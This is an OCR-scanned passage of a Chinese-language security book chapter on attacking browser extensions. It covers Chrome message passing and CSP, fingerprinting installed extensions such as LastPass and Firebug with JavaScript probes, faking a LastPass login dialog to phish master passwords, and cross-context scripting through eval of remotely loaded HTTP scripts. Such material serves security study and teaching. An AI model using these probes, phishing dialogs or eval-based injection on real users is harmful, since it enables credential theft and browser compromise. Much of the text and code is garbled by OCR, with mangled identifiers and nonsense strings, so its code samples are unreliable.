这 些 扩展 可 以 访问 密码 、 添 加 击 键 日 志 ， 等 等 。 有 些 扩展 甚至 会 通过 HTTP 将 这 些 数据 发 给 
第 三 方 应 用 。 这 些 不 安全 的 迹象 表明 , 开发 者 并 没有 把 安全 放 在 第 一 位 ， 可 能 会 导致 扩展 成 为 众 
矢 之 的 。 

(4) 安全 边界 

安全 边界 将 内 容 脚 本 ( 及 网 页 ) 与 扩展 的 其 他 部 分 隔 开 。 内 容 脚 本 在 HTTP (S) 源 的 网 页 及 
chrome-extension:// 源 的 其 他 页 面 中 运行 。 这 两 个 源 之 间 只 通过 消息 传递 通信 。 默 认 情 况 下 ,这 相 
当 于 在 不 受信 任 的 网 页 和 高 权限 的 扩展 后 端 之 间 筑 起 了 一 道 有 效 的 屏障 。 

谷歌 甚至 提供 了 "不 安全 编码 的 示例 ， 来 帮助 我 们 理解 和 发 现 目 标 扩展 中 的 安全 漏洞 。 下 面 
就 是 一 个 在 扩展 后 台 页 中 运行 ， 并 与 内 容 脚 本 通信 的 代码 示例 : 

chrome.tabs.sendMessage(tab.id, {greeting: "hello"}, function(response) { 


var resp = eval("(" + response.farewell + ")"); 


PES 


前 面 的 代码 不 安全 地 使 用 了 eval ， 将 内 容 脚本 消息 作为 参数 的 一 部 分 。 下 面 这 个 例子 使 用 
innerHTMI 将 不 受信 任 的 响应 写 人 DOM: 


chrome.tabs.sendMessage(tab.id, {greeting: "hello"}, function(response) { 
document .getElementById("resp").innerHTML = response. farewell; 


)); 

注意 ，eval 和 innerHTML 都 是 审读 目标 扩展 的 代码 时 ， 需 要 重点 关注 的 地 方 ， 尤 其 是 在 后 
台 页 面 中 使 用 的 时 候 。 这 样 的 代码 就 会 导致 XSS 漏 洞 ， 稍 后 会 继续 讨论 。 

我 们 需要 利用 这 些 漏洞 , 通过 内 容 脚 本 把 攻击 代码 携带 进去 。 只 有 这 样 才能 间接 访问 相应 的 
消息 传递 API。 Ail, 还 有 一 种 情况 。 如 果 开 发 者 在 manifest.json 文 件 中 明确 声明 了 ,那么 可 以 在 
网 页 中 直接 访问 消息 API: 

"externally_connectable": { 


"matches": ["http://browservictim.com/*"] 


} 
在 这 行 JSON 代 码 中 , externally_connectable 声 明 意味 着 源 可 以 直接 访问 消息 传递 API。 
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因此 对 目标 扩展 的 清单 文件 中 的 这 些 地 方 也 应 该 注意 。 

因为 谷歌 不 允许 在 sxternally_connectable 匹 配 模式 中 使 用 更 宽泛 的 通配符 ， 所 以 这 里 
的 攻击 机 会 变 少 了 。 换 名 话说， 开发 者 不 能 包含 * 或 *.com 这 样 的 主机 名 模式 。 显 然 ， 如 果 
http://browservictim.com 存 在 XSS 攻 击 漏洞 ， 那 么 它 就 是 一 个 可 能 的 攻击 地 点 。 

Chrome 扩 展 有 一 个 安全 边界 ， 在 这 里 只 能 发 送 预 定义 的 消息 。 这 个 安全 边界 有 效 减 少 了 攻 
击 面 。 不 过 ， 攻 击 空 间 还 是 有 的 ， 因 此 值得 探究 。 

(5) 内 容 安全 策略 

谷歌 在 Chrome 扩 展 中 融入 了 CSP 的 概念 ”。 正 像 前 几 音 讨论 的 ，CSP 是 一 组 强加 给 Web 资 源 
的 限制 。 辅 以 其 他 手段 ，CSP 可 以 根据 脚本 来 源 ， 有 选择 地 禁用 或 启用 脚本 执行 ， 有 效 降低 开发 
者 因 一 时 玻 忽 造成 的 安全 问题 的 概率 。 
具体 的 CSP 限 制 是 通过 manifestjson 文 件 中 HJcontent security policy 参数 来 定义 的 。 
如 果 扩 展 没 有 明确 定义 CSP，Chrome 会 应 用 相对 严格 的 限制 规则 。 默 认 的 CSP 指 令 如 下 所 示 : 

Script-src 'self'; object-src 'self' 

这 条 指令 会 对 任何 成 功 注入 后 端 扩 展 组 件 中 的 攻击 代码 施加 如 下 限制 。 
口 不 允许 外 部 加 载 脚 本 。 换 句 话 说 ，<script src=http://browserhacker.com> 不 会 
运行 。 
a 不 允许 外 部 加 载 对 象 。 换 句 话说 ， 不 支持 Java、Flash， 等 等 。 
D 不 允许 行内 脚本 。 换 句 话 说， 不 允许 <script>coqe</script>。 
O 不 允许 eval () 。 

这 意味 着 可 攻击 的 点 减少 。 不 过 ， 也 不 能 回避 一 个 问题 : 有 多 少 扩展 开发 者 愿意 放松 CSP 限 
制 ， 以 便 让 自己 更 轻松 ? 开发 者 , 包括 扩展 开发 者 ,都 喜欢 使 用 JavaScript 模 板 引 擎 ， 而 很 多 这 种 
引擎 都 会 使 用 eval () 函数 。 为 了 保证 它们 正确 执行 , 需要 在 清单 文件 中 使 用 unsafe-eval 指 令 。 

不 用 说 , 安全 肯定 比 新 潮 的 JavaScript 模 板 引擎 重要 得 多 ! 但 不 难 发 现 , 总 会 有 项 目 经 理 说 “ 风 
险 可 接受 ”， 而 负责 安全 的 人 在 那里 小 声 哪 嘻 也 无 济 于 事 。 

CSP 应 用 于 扩展 的 UI 页 面 和 后 台 页 面 。 只 有 位 于 安全 边界 内 的 扩展 组 件 受 此 保护 。CSP 不 适 
用 于 内 容 脚 本 。 因 此 对 内 容 脚 本 中 的 漏洞 是 可 以 放心 利用 的 。 当 然 , 在 内 容 脚 本 中 运行 代码 非常 
受 限 ， 不 过 仍然 可 以 组 织 有 效 攻 击 。 本 章 后 面 还 会 进一步 讨论 这 些 攻击 。 

总 之 不 要 忘 了 , 看 一 看 目标 扩展 清单 文件 中 的 content_security_policy 人 参数。 仅仅 有 安 
全 锁 住 的 手段 ， 并 不 意味 着 一 定 会 锁 住 。 


7.1.6 IE 扩展 


正 扩 展 ” 的 用 户 并 不 像 Firefox 和 Chrome 那 么 多 。 无 论 造成 这 种 差异 的 原因 为 何 ， 结 果 就 是 也 
扩展 的 攻击 范围 小 。 

微软 把 IE 扩展 归 类 为 包含 BHO ( Browser Helper Objects, 浏览 器 帮助 对 象 ) 工具 条 和 ActiveX 
控件 2。 显 然 ， 这 些 都 是 主要 被 编译 为 原生 代码 的 技术 。 因 此 ， 它 们 更 容易 出 现 缓冲 区 溢出 、 格 
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式 字 符 串 漏洞 、 整 型 bug 等 传统 的 问题 。 

使 用 受 控 代 码 编写 下 扩展 ， 可 以 减少 出 现 漏洞 的 机 会 。 但 有 意思 的 是 ,微软 不 推荐 使 用 受 控 
代码 编写 浏览 器 扩展 ”“。 原 因 在 于 这 样 编写 的 扩展 运行 在 浏览 器 进程 中 ， 而 微软 不 希望 扩展 拖 慢 
用 户 体验 。 

与 Chrome 和 Firefox 的 扩展 不 同 , 不 可 能 解压 缩 正 扩展 来 宪 探 源 代 码 。 因 为 它们 是 以 Windows 
操作 系统 为 对 象 编译 的 ， 所 以 想 看 源 代 码 并 不 容易 。 不 过 ， 使 用 F12 提 供 的 工具 ， 倒 是 可 以 观察 
一 些 可 见 的 功能 。 

攻击 本 地 编译 软件 超出 了 本 书 范畴 ， 不 过 这 方面 有 很 多 资料 可 以 查阅 。 有 些 资料 在 第 1 章 中 
提 到 过 ， 如 果 有 兴趣 ， 可 以 翻 回去 了 解 一 下 。 

当然 ,根据 扩展 的 实现 方式 不 同 ， 还 是 很 有 可 能 发 现 XSS 之 类 的 漏洞 。 只 不 过 对 下 而 言 ， 这 
种 攻击 范围 不 像 对 其 他 浏览 器 的 扩展 攻击 范围 那么 大 ， 因 此 我 们 就 顺便 提 一 下 就 行 了 。 


7.2 采集 扩展 指纹 


采集 目标 浏览 需 指 纹 的 方法 很 多 ,而 采集 扩展 指纹 也 大 同 小 异 。 确 定 目标 安装 了 什么 扩展 非 
常 重要 。 只 有 这 样 ， 攻 击 才能 更 直截了当 ， 并 能 排除 不 确定 性 。 

人 研究 人 员 Brendan Coles, Graziano Felline, Giovanni Cattani ~ 和 Krzysztof Kotowicz” 找到 了 很 
多 枚 举目 标 可 能 会 使 用 的 扩展 的 方法 。 扩 展 并 不 会 隐瞒 它们 会 增 大 浏览 器 攻击 面 的 事实 ,事实 上 ， 
有 些 扩展 还 会 主动 告诉 你 。 

接 下 来 几 小 节 介 绍 检测 扩展 的 几 种 方法 。 


7.2.1 使 用 HTTP 首部 采集 指纹 


有 的 扩展 可 能 会 稍微 修改 一 点 请 求 首部 ， 而 有 的 扩展 则 生怕 别人 不 知道 浏览 器 安装 了 它们 ， 
对 请 求 首 部 进行 重度 定制 。 为 了 采集 扩展 指纹 , 我 们 需要 通过 检测 目标 扩展 , 来 确定 请 求 首部 是 
否 被 修改 过 。 

为 了 看 出 修改 , 可 以 捕获 安装 扩展 前 后 的 请 求 首部 加 以 比较 ,一 比较 就 能 看 出 不 同 。 别 忘 了 ， 
有 些 扩展 只 有 激活 才 会 有 所 不 同 。 下 面 我 们 即将 展示 的 FirePHP 的 例子 就 是 这 样 的 。 

男 一 种 检测 首部 变化 的 方法 是 查询 扩展 源 代码 。 当 然 , 只有 Firefox 和 Chrome 扩 展 是 可 以 查看 
源 代码 的 ， 因 为 它们 的 安装 文件 只 是 简单 的 包含 代码 的 压缩 .zip 文 件 。 

对 于 Chrome 扩 展 , 某 个 视图 页 面 ( 通常 是 后 台 页 面 ) 会 动态 修改 请 求 首部 ,应 该 搜索 chrome. 
webRequest . onBeforeSendHeader AIA A. 使 用 这 个 API 需 要 webRequest 权 限 ， 因此 首先 应 
该 检测 manifest.json 文 件 ， 看 看 是 否 请 求 了 该 权限 。 如 果 没 有 ， 那么 onBeforeSengd Headers PK 
数 存 在 与 否 就 无 所 谓 了 。 

另 一 种 在 Chrome 扩 展 中 注入 自 定义 首部 的 方式 是 在 内 容 脚 本 里 。 就 是 使 用 标准 的 XMLHEEP 
Request .setRedquestHeader 冰 数 发 送 Ajax 请 求 。 搜 索 这 个 函数 也 有 助 于 发 现 扩展 是 否 在 操纵 
浏览 器 首部 。 






























































































































































































































































260 第 7 章 攻击 扩展 














对 于 Firefox 扩 展 ,搜索 setReauestHeadqer 可 以 找到 修改 请 求 首部 的 位 置 。 在 下 面 的 FirePHP 
代码 中 ， 可 以 看 到 该 扩展 修改 了 User-Agent 请 求 首部 : 


httpChannel.setRequestHeader ("User-Agent", 
httpChannel.getRequestHeader ("User-Agent") + ' '+ 
"FirePHP/" + firephp.version, false); 


这 行 代码 让 FirePHP 扩 展 在 User-Agent 请 求 首 部 后 面 追加 了 FirePHP/<VERSIONNUMBER>， 
从 而 表明 自己 的 可 用 性 。 正 如 下 面 的 请 求 首部 所 示 ， 要 发 现 这 一 点 非常 容易 : 


GET / HTTP/1.1 

Host: browserhacker.com 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 

OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0 FirePHP/0.7.1 

Accept: text/html, application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 


HUM Firefox V a TE TAK HAIL A Web IRS He WHT TP IKET o User-Agent Sb 08 
后 面 有 FirePHP/0.7.1。 这 里 ,不 仅 可 以 看 到 用 户 安装 了 扩展 ， 还 知道 了 扩展 的 版 本 。 


7.2.2 ”使 用 DOM 采集 指纹 


MEAL, DOMBIHS SEE, 令 人 景仰 。 可 以 访问 的 DOM 属 性 也 有 很 多 。 正 如 上 一 章 讨论 
的 ， 有 些 属性 只 有 某 些 浏览 器 中 才 有 。 同 样 ， 某 些 DOM 属 性 也 只 有 安装 (并 激活 ) 了 特定 扩展 
之 后 才 有 。 

在 通过 DOM 采 集 指纹 时 ,需要 查看 内 购 框 架 、 全 加 层 和 不 可 见 的 <daiv> 元 素 。 有 了 时候 ， 这 
些 元 素 会 在 特定 条 件 下 才 出 现在 Web 应 用 中 ( 比如 ,访问 特定 域 、 网 站 标题 匹配 ,或 存在 某 些 元 
素 )。 使 用 Firebug 之 类 的 工具 ， 可 以 看 到 扩展 在 空 HTML 页面 中 都 会 做 什么 ， 然 后 基于 扩展 代码 
分 析 ， 掌 握 它们 会 在 页 面 中 添加 什么 内 容 。 

1. LastPass 的 例子 

LastPass 是 一 个 密码 管理 工具 ， 可 以 让 用 户 的 密码 更 安全 。 在 Chrome 中 ，LastPass 扩 展会 在 
HTML 页 面 开始 构建 之 前 勾 连 DOM。 在 Chrome 扩 展 中 ， 这 是 在 manifest.json 文 件 中 配置 的 。 如 下 
所 示 ， 针 对 所 有 URL， 都 会 在 aocument_start 期 间 加 载 onloadwffjs: 


"all_frames": true, 




































































"js": [ "onloadwff.js" ], 
"matches": [ "http://*/*", "https://*/*", "file:///*"- Jy 
"run at": "document start" 


这 里 先 忽 略 问 题 多 多 又 很 宽松 的 file:///* 匹 配 模式 ， 只 考虑 采集 指纹 。 在 JavaScript 文 件 
onloadwff.js 中 , 会 把 自 定义 的 函数 添加 给 DoMContentLoaded 事 件 , 浏览 避 会 在 文档 加 载 和 解析 
之 后 触发 这 个 事件 , 但 通常 是 在 内 部 框架 、 图 片 和 样式 表 被 解析 之 前 。 最 后 ,扩展 会 运行 一 个 隔 
数 ， 修 改 演 染 后 页 面 的 DOM， 给 它 添加 一 个 新 的 、 空 的 script 标 签 : 


<script id="hiddenlpsubmitdiv" style="display: none;"></script> 
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PP ét, TEDOMJR Bii A JavaScript. 但 不 管 怎 样 , 现在 的 DOM 中 就 有 了 它 存在 的 线索 。 
正 像 第 6 章 讨论 的 ， 通 过 检测 DOM 来 采集 浏览 器 属性 的 指纹 是 很 有 效 的 ， 而 对 LastPass 来 说 ， 同 
样 如 此 。 不 过 LastPass 还 有 个 问题 , 假如 HTML 中 不 包含 表单 ， 那么 LastPass 就 不 会 修改 DOM。 在 
onloadwffjs 文 件 中 ， 可 以 清楚 地 看 到 这 一 点 。 相 关 条 件 在 修改 DOM 的 代码 之 前 : 


if(b != "acidtests.org" && 
a.getElementById("hiddenlpsubmitdiv") == null && 
a.forms.length > 0) { 


这 个 让 语句 检测 当前 页 面 ， 确 定 不 是 acidtests.org ， 而 且 DOM 中 并 不 包含 hiddenlpsubmitdiv 
脚本 ， 同 时 至 少 要 有 一 个 HTML 表 单 。 如 果 页 面 中 包含 表单 ， 则 修改 DOM， 我 们 可 以 通过 以 下 
JavaScript， 来 检测 LastPass 存 在 与 否 : 


var result = "Not in use or not installed"; 

















var lpdiv = document.getElementById('hiddenlpsubmitdiv'); 


// 先 检查 div 
if (typeof (lpdiv) != 'undefined' && lpdiv !- null) ( 
result - "Detected LastPass through presence of the «script» 


tag with id-hiddenlpsubmitdiv"; 


// 使 用 jQuery 搜索 脚本 元 素 中 的 lastpast_iter 
) else if ($("script:contains (lastpass_iter)").length > 0) { 

result = "Detected LastPass through presence of the embedded <script> 
which includes references to lastpass_iter"; 


} else { 
if (document .getElementsByTagName("form").length == 0) ( 
result = "The page doesn't seem to include any forms - we can't tell if 


LastPass is installed"; 
j 
} 


首先 ，JavaScript 检 测 前 面 讨论 的 脚本 元 素 。 如 果 没 找到 ， 则 进一步 检测 般 入 的 JavaScript。 
最 后 ， 如 果 页 面 中 没有 表单 ， 则 脚本 会 更 新 result 变 量 。 

根据 DOM 属 性 有 无 来 采集 浏览 器 扩展 指纹 是 一 种 可 靠 的 方式 。 可 以 作为 线索 的 DOM 属 性 在 
在 与 否 ， 完 全 取决 于 目标 有 无 。 

2. Firebug 的 例子 

Firebug 可 以 作为 扩展 安装 ， 也 可 以 作为 脚本 加 载 ( Firebug Lite )。 就 以 Firebug 为 例 ， 来 看 一 
下 如 何 检测 扩展 的 少量 差异 。 在 知道 安装 了 扩展 之 后 , 应 该 确认 它 就 是 我 们 知道 的 扩展 , 而 非 Lite 
版 本 。 这 并 不 容易 ， 因 为 两 个 版 本 会 在 DOM 中 生成 相同 的 属性 。 不 过 ， 可 以 利用 一 个 只 有 Lite 
版 本 中 才 有 的 属性 。 

要 检测 Firebug 扩 展 ,使 用 以 下 DOM 属 性 : ! !window.console.clear,!!window.console. 
exception 和 !!window.console.table。 如 果 它 们 全 部 返回 true，, 则 说 明 浏览 如 安装 并 激活 
了 Firebug。 

仅 针 对 Firebug Lite 的 测试 是 ! !1window .console.provider。 如 果 你 想 确 定 该 扩展 不 是 Lite 
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版 本 ， 就 需要 最 后 一 个 测试 条 件 返回 false。 


7.2.3 ”使 用 清单 文件 采集 指纹 


过 去 ， 通 过 分 析 扩 展 就 能 很 容易 采集 扩展 指纹 。 基 于 清单 文件 版 本 1 的 谷歌 Chrome 扩 展 ， 允 
许 访问 扩展 的 所 有 文件 ， 就 是 通过 相应 的 URL 来 实现 : chrome-extension:///path/to/file.txt。 因 为 所 
有 扩展 都 有 一 个 manifestjson 文 件 ， 所 以 知道 GUID 后 就 可 以 请 求 下面 的 URL 了 : 

chrome-extension://abcdefghijklmnopqrstuvwxyz012345/manifest.json 

不 过 那 是 以 前 了 。 现在 , 需要 利用 清单 文件 中 列 出 的 文件 , 稍微 麻烦 一 点 才能 采集 扩展 指纹 。 
在 清单 文件 版 本 2 中 ， 和 谷歌 默认 不 允许 访问 扩展 的 资源 。 

当然 ， 有 些 扩 展开 发 者 依赖 于 资源 可 访问 才能 正常 工作 。 谷 歌 在 manifest.json 文 件 中 ， 创 建 
了 一 个 新 的 数组 , 叫 wepb_accessible_resources。 这 个 数组 列 出 了 可 以 通过 URL 访 问 的 资源 。 
以 下 来 自 清单 文件 中 的 代码 片段 , 就 是 这 样 一 个 被 声明 的 数组 的 例子 , 其 中 将 logo.png .menu.html 
和 style.css 标 记 为 可 访问 : 

{ 
"name": "extensionName" y 
"version": "versionString", 


"manifest version": 2 


}, 


"web accessible resources": [ "logo.png", "menu.html", "style.css" ] 


j 

对 这 个 虚构 的 扩展 而 言 ， 可 以 通过 以 下 URL 访 问 logo.png 资 源 : 

chrome-extension://abcdefghijklmnopqrstuvwxyz012345/10go.png 

实际 上 ， 只 要 两 个 信息 就 可 以 采集 目标 扩展 指纹 了 。 第 一 个 是 GUID ， 稍 后 会 介绍 ; 第 二 个 
就 是 web_accessiple_resources 数 组 中 定义 了 什么 资源 ( 如 果 有 的 话 )。 

好 在 ， 大 多 数 扩展 都 至 少 会 在 web_accessible_resources 数 组 中 声明 一 项 资源 。 知 道 这 
个 资源 后 ， 接 下 来 是 找到 扩展 的 GUID( 32 位 字符 串 )。 只 要 到 Chrome Web Store 中 抓 取 相 关内 容 
就 行 了 。 

可 以 手工 抓 取 ， 也 可 以 使 用 Kotowicz 开 发 的 XSS ChEF”* 之 类 的 工具 。 这 些 工 具 会 从 Chrome 
Web Store 下 载 并 解压 扩展 ， 你 可 以 使 用 它 扫 描 manifest.json 文 件 ， 并 在 此 基础 上 构建 你 的 Chrome 
扩展 指纹 采集 数据 库 。 

有 了 Chrome 扩 展 指纹 数据 库 ， 需 要 在 勾 连 浏览 器 中 运行 一 些 代码 ， 探 测 相 应 资源 。 以 前 面 
的 logo.png 资 源 为 例 ， 可 以 生成 以 下 代码 ”: 


var testScript = document.createElement ("Script"); 

testURL = "chrome-extension://abcdefghijklmnopqrstuvwxyz012345/1ogo.png"; 
testScript.setAttribute("onload", "alert('Extension Installed!')"); 
testScript.setAttribute("src", testURL); 

document .body.appendChild(testScript) ; 
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基于 这 段 代 码 的 模式 ， 可 以 迭代 扩展 数据 库 ， 迅 速 采集 目标 扩展 指纹 。 
前 面 几 小 节 介绍 的 方法 , 可 以 帮 你 确定 目标 浏览 吉安 装 了 什么 扩展 。 而 对 攻击 扩展 的 研究 还 
在 继续 ， 因 此 需要 持续 关注 最 新 涌现 的 技术 。 


7.3 攻击 扩展 


攻击 目标 的 途径 可 能 有 多 个 , 具体 取决 于 扩展 的 功能 。 从 攻击 者 角度 看 ,知道 有 哪些 切入 点 
是 非常 重要 的 。 

如 果 开 发 者 编写 的 扩展 界面 容易 在 网 页 源 中 再 现 、 加 密 不 足 、 验 证 不 够 等 , 那么 就 可 能 出 现 
漏洞 。 下 面 我 们 直接 拿 几 个 现实 中 的 例子 来 讨论 。 


7.3.1 冒充 扩展 


此 时 此 刻 ， 你 可 能 觉得 没有 必要 盗 取 别人 的 密码 。 如 果 可 以 注入 代码 、 切 和 会话 ,以 及 冒充 

用 户 而 无 需 输入 密码 ， 那 干 嘛 还 去 盗 人 家 密码 呢 ? 
第 2 章 和 第 $ 章 简单 介绍 了 通过 社会 工程 学 技术 盗 取 密 码 , 但 并 没有 谈 及 重用 密码 的 问题 有 多 
严重 。2011 年 ，Joseph Bonneau” 通 过 分 析 攻 击 Gawker 和 rootkit.com 取 得 的 密码 散 列 ， 研究 了 密码 
重用 问题 。 他 的 研究 只 基于 比较 这 两 个 系统 中 的 少数 用 户 , 得 出 的 结论 是 保守 估计 : 密码 重用 率 
达到 30% 左 右 。 

就 算 这 个 数字 估计 得 偏 高 ， 也 不 能 认为 很 多 用 户 不 会 在 某 些 系统 中 设置 相同 的 密码 。 当 然 ， 
解决 密码 重用 问题 比较 常见 的 办 法 之 一 , 是 对 访问 的 每 个 网 站 都 随机 生成 不 同 的 密码 。 而 这 又 会 
引发 一 系列 的 后 续 问 题 。 

冒充 LastPass 扩 展 

普通 人 怎么 保存 自己 多 个 不 同 的 密码 ? 把 它们 都 写 到 一 张 纸 上 算 一 种 方式 , 而 这 种 方式 有 多 
安全 则 取决 于 能 否 将 这 张 密码 纸 保存 好 。 使 用 密码 管理 软件 是 男 一 种 方式 , 而 且 随 着 在 线 获 取 手 
段 的 增加 ， 这 种 方式 越 来 越 流 行 。 当 然 , 这 种 方式 大 行 其 道 的 男 一 个 原因 ， 是 媒体 不 断 曝光 入 侵 
密码 的 问题 ， 以 及 使 用 同样 密码 的 弊端 。2012 年 ，LinkedImm 密 码 泄露 事件 突显 了 数 百 万 用 户 的 密 
码 安全 问题 ?”。 对 于 攻击 者 而 言 ， 第 一 个 问题 可 能 不 应 该 是 为 什么 要 盗 取 密码 ， 而 是 在 能 够 盗 取 
受害 者 所 有 密码 访问 手段 的 情况 下 ， 为 什么 还 要 盗 取 密 码 ? 

这 一 切 跟 扩展 有 什么 关系 ? HIE, 很 多 密码 管理 软件 都 有 一 个 常见 的 功能 , 就 是 与 浏览 器 集 
Ro 事实 上 ， 某 些 软件 使 用 浏览 器 扩展 作为 其 主要 访问 手段 。 

LastPass 就 是 这 样 一 个 扩展 ， 一 个 相对 流行 的 在 线 密码 管理 软件 包 "。 在 这 里 ,“ 在 线 ” 的 意 
思 是 LastPass 把 用 户 密码 保存 在 自己 的 系统 中 ， 从 而 实现 用 户 在 互联 网 上 的 多 个 浏览 器 和 设备 间 
同步 这 些 密码 。 

那么 这 些 在 线 密 码 系统 安全 吗 ? 攻击 这 些 系 统 的 一 个 方法 是 使 用 社会 工程 学 技术 。 对 
Chrome 而 言 ， 需 要 UI 交 互 的 扩展 经 常会 使 用 无 害 的 框架 列 出 扩展 的 按钮 。 图 7-12 展 示 了 LastPass 
的 登录 对 话 框 。 
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€ Q | D about:blank ga »| = 


Last 


Email 
CD» 
Password 
SE: 

& Remember Email 

@ Remember Password 


[ Show Vault After Login 
CE Cema) 
n | forgot my password, Help 


Screen Keyboard 


G Create Account 








图 7-12 Chrome 的 LastPass 扩 展 

















可 惜 的 是 ， 除 了 一 些 很 小 的 部 件 ， 比 如 引出 LastPass 按 钮 的 右上 角 的 小 三 角形 ， 没 有 太 多 指 
标 用 于 验证 这 个 对 话 框 的 完整 性 。 相 对 而 言 ， HTTPS 不 仅 有 挂 锁 图 标 、 不 一 样 的 地 址 栏 , 还 有 其 
他 用 户 比 较 熟 识 的 队列 。 Chrome 扩 展 的 UI 元 素 没有 提供 这 么 多 特性 。 因此 , 显示 一 个 新 DIV 元 素 ， 





甚至 一 个 新 内 骨 框 架 ， 就 可 以 冒充 这 个 对 话机 





H 








@ O O / È BeEF Basic Demo 


甘 。 图 7-13 展 示 了 一 个 冒充 的 LastPass 对 话 框 
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€ > GB localhost:3000/demos/basic.html 





ou should be hooke| 
Have fun while your 


hese links are for de 


Password 
naa 
[ Remember Email 

[ Remember Password 

[ Show Vault After Login 


Org 
e Slashdo 


Have a go at the even 
Insert your secret herd 


ou can also load up 


a | forgot my password, Help 


Screen Keyboard 


区 Create Account 


图 7-13” 假 的 LastPass 对 话 框 





WI 





比较 一 下 图 7-13 和 岁 7-12， 可 以 发 现 缺少 的 视觉 提示 元 素 非常 小 。 利 用 这 个 伪装 ， 辅 以 其 他 
社会 工程 学 手段 ， 比 如 微妙 的 提示 窗口 ， 就 可 能 引诱 受害 者 泄露 其 LastPass 登 录 信 息 。 然 后 ， 使 
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用 键盘 记录 程序 (第 $ 章 介绍 过 ) 就 可 以 轻易 获得 这 些 信息 。 利 用 这 些 信息 可 以 访问 受害 者 的 
LastPass 账 号 ， 从 而 打开 通 向 所 有 密码 的 大 门 。 


7.3.2” 跨 上 下 文 脚 本 攻击 


XCS ( Cross-context Scripting， 跨 上 下 文 脚本 攻击 ) 有 时 候 也 叫 跨 区 域 脚本 攻击 ( Cross-zone 
Scripting ) ,是 一 种 从 不 受信 任 区 域 向 受信 任 区 域 发 送 指令 的 扩展 攻击 方法 ”。 从 互联 网 区 域 向 
有 特权 的 chrome:// 区 域 “ 走 私 ”JavaScript 指 令 ， 是 这 种 攻击 的 典型 方式 。 

这 到 底 意 味 着 什么 当 互 联网 上 的 一 个 网 站 成 功 向 浏览 絮 扩 展 的 chrome:// 区 域 注 入 代码 
时 ， 就 是 XCS。 当 执行 指令 时 ， 这 些 指令 拥有 与 它们 被 注入 到 的 扩展 组 件 相 同 的 特权 。 利 用 这 一 










































































点 ， 可 以 在 目标 浏览 器 中 执行 高 权限 命令 。 
还 记得 本 章 前 面 介绍 的 浏览 器 扩展 安全 模型 吧 , Firefox 的 安全 模型 很 简单 , 而 Chrome 则 拥有 
被 安全 边界 区 隔 的 两 级 特权 。 





在 Chrome 扩 展 安全 边界 的 后 台 页 面 一 端 ， 组 件 都 经 过 了 CSP 加 强 。 然 而 ， 在 边界 的 另 一 端 ， 
相应 组 件 ( 内 容 脚本 ) 则 没有 同样 的 防御 措施 。 内 容 脚 本 可 以 在 浏览 器 访问 的 网 页 上 下 文中 运行 ， 
可 以 读 取 和 写 人 相关 页 面 的 DOM。 这 种 对 网 页 的 直接 交互 为 攻击 提供 了 最 大 的 可 能 性 。 这 一 点 ， 
再 加 上 在 半 特 权 上 下 文中 的 执行 ， 特 别 值得 我 们 关注 。 

要 攻击 的 扩展 架构 不 同 , 攻击 的 方法 也 不 同 。 下 面 我 们 就 看 几 个 在 浏览 器 扩展 中 实现 XCS 的 
例子 。 

1. 中 间 人 攻击 

扩展 中 使 用 远程 加 载 的 数据 ， 可 能 会 为 攻击 者 提供 机 会 。 这 是 因为 服务 器 可 能 会 被 控制 ， 加 
载 的 内 容 可 能 使 用 明文 HTTP 协 议 , 或 者 验证 不 足 。 

别 忘 了 第 2 章 讨论 的 中 间 人 攻击 ， 中 间 人 攻击 就 是 控制 明文 通信 渠道 ， 然 后 插入 恶意 数据 。 
这 样 ， 就 可 以 介入 通信 流程 ， 从 而 实现 XCS。 

有 些 扩展 会 在 受信 任 的 chrome:// 区 域 中 ,直接 使 用 加 载 自 远 程 服务 器 的 内 容 。 可 能 是 扩展 术 
心 功能 所 需 , 也 可 能 是 由 于 对 内 容 过 滤 琉 忽而 无 意 造 成 的 一 个 漏洞 。 何 时 何 地 使 用 不 受信 任 的 数 
据 取 决 于 目标 扩展 。 

在 Firefox 扩 展 中 ,需要 寻找 一 些 关键 的 指标 。 在 解压 后 的 源 代码 中 搜索 下 面 几 个 函数 ， 可 以 
帮 你 定位 相应 的 漏洞 : 


口 window.open() 






























































UO window. opendialog() 
ü nsrWindowWatcher() 
口 XMLHTTPRequest() 
如 果 chrome:// 区 域 中 通过 不 受信 任 的 数据 , 调用 了 上 述 任何 一 个 函数 , 都 说 明 存 在 一 个 漏洞 。 
有 这 样 一 个 漏洞 ,就 可 以 癌 其 中 注入 JavaScript 代 码 , 实现 恶意 目的 。 结果 可 能 取决 于 Firefox 扩 展 
如 何 使 用 接收 到 的 数据 ， 也 取决 于 你 是 否 能 够 找到 注入 代码 的 方法 。 

同样 ， 对 于 Chrome 扩 展 也 是 如 此 ， 不 过 仅 限 于 清单 文件 版 本 1。 当 前 的 内 容 安全 策略 不 允许 
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通过 HTTP 加 载 脚本 ， 只 人 允许 通过 HTTPS 加 载 白 名 单 脚 本 。 
不 过 ， 别 忘 了 ， 有 志 者 事 竟 成 。 下 面 是 摘自 Stack Overflow 问 答 社区 3 的 一 段 代 码 (已 编辑 ): 


function loadInsecureScript(url) { 
var x = new XMLHttpRequest (); 
x.onload = function() { 
eval (x.responseText); // «-- 安全 漏洞 
s 
x.open('GET', url); 
x.send(); 


} 



































loadInsecureScript ('http://browservictim.com/insecure.js'); 


有 人 也 给 出 了 manifestjson 文 件 中 需要 有 什么 : 


"content security policy": "script-src 'self' 'unsafe-eval'; object-src 'self'", 
"permissions": ["http://browservictim.com/insecure.js"], 
"background": {"scripts": ["background.js"] ) 




















根据 问答 者 的 描述 , 使 用 这 样 的 代码 会 导致 大 量 安全 问题 。 即 使 是 编写 类 似 的 代码 ,也 应 该 
引起 相关 开发 者 的 警惕 。 

不 管 扩展 中 为 什么 会 存在 这 样 的 漏洞 ， 这 种 不 安全 的 数据 传输 经 常会 导致 XCS 发 生 。 如 果 这 
些 通信 基于 不 加 密 的 HTTP 进 行 ， 那么 中 间 人 攻击 (第 2 章 介绍 过 ) 的 后 果 ， 最 低 限 度 也 会 影响 有 
特权 的 chrome:// 区 域 代码 的 执行 。 

中 间 人 攻击 是 否 会 导致 命令 注入 ， 取 决 于 扩展 使 用 数据 的 方式 。 我 们 简单 看 一 个 不 会 导致 
XCS 的 例子 ， 不 过 根据 扩展 使 用 数据 的 方式 ， 不 排除 其 他 攻击 目标 的 方式 存在 。 

中 间 人 攻击 的 例子 

